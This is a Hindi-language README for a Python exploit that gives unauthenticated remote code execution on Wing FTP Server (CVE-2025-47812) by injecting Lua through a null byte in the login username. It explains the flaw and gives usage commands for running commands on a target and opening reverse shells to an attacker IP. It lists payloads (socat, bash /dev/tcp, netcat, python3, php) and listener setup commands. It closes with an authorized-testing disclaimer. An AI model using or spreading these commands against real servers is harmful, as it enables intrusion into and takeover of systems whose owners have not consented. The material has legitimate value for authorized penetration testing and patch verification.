
Wing FTP सर्वर (CVE-2025-47812) के लिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन शोषण, जिसमें कई रिवर्स शेल पेलोड, इंटरैक्टिव और CLI मोड, और स्वचालित सत्र हैंडलिंग शामिल हैं।
| क्षेत्र | मान |
|---|
| CVE | CVE-2025-47812 |
| प्रभावित | Wing FTP Server < 7.4.4 |
| प्रकार | अप्रमाणित रिमोट कोड निष्पादन |
| CVSS स्कोर | 10.0 (गंभीर) |
| सुधार संस्करण | Wing FTP Server 7.4.4 |
यह भेद्यता /loginok.html लॉगिन एंडपॉइंट में मौजूद है। सर्वर username फील्ड में नल बाइट्स (%00) को सैनिटाइज़ करने में विफल रहता है। इससे हमलावर सत्र फ़ाइलों में मनमाना Lua कोड इंजेक्ट कर सकता है, जिसका बाद में सर्वर-साइड मूल्यांकन किया जाता है जब /dir.html जैसे एंडपॉइंट एक्सेस किए जाते हैं — बिना किसी प्रमाणीकरण की आवश्यकता के।
--payload फ़्लैग से विशिष्ट पेलोड चुनें-o से कमांड आउटपुट फ़ाइल में सहेजें--timeout और --delay-v के साथ वर्बोज़/डीबग मोडCtrl+C हैंडलिंगpip install requests
python3 wingftp_rce_exploit.py
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url लक्ष्य मूल URL
-U / --username लॉगिन उपयोगकर्ता नाम (डिफ़ॉल्ट: anonymous)
-c / --command चलाने के लिए कमांड (कमांड मोड)
-r / --rhost आपका लिसनर IP (रिवर्स शेल मोड)
-p / --rport आपका लिसनर पोर्ट (रिवर्स शेल मोड)
--payload उपयोग करने के लिए विशिष्ट पेलोड (नीचे सूची देखें)
--timeout HTTP अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--delay पेलोड प्रयासों के बीच विलंब सेकंड में (डिफ़ॉल्ट: 4)
-o / --output कमांड आउटपुट फ़ाइल में सहेजें
-v / --verbose डीबग आउटपुट सक्षम करें
| नाम | विधि |
|---|---|
socat | socat के माध्यम से पूर्ण PTY |
bash | /dev/tcp रिडायरेक्ट |
python3 | सॉकेट सबप्रोसेस |
nc-e | -e फ़्लैग के साथ Netcat |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |
लक्ष्य URL : http://192.168.1.10:5466
उपयोगकर्ता नाम : anonymous
विकल्प : 1
कमांड : whoami
चरण 1 — अपना लिसनर शुरू करें (पूर्ण TTY के लिए socat अनुशंसित):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
या nc के साथ:
nc -lvnp 4444
चरण 2 — एक्सप्लॉइट चलाएँ:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
उन प्रणालियों के विरुद्ध इसका उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है।
अनधिकृत उपयोग अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।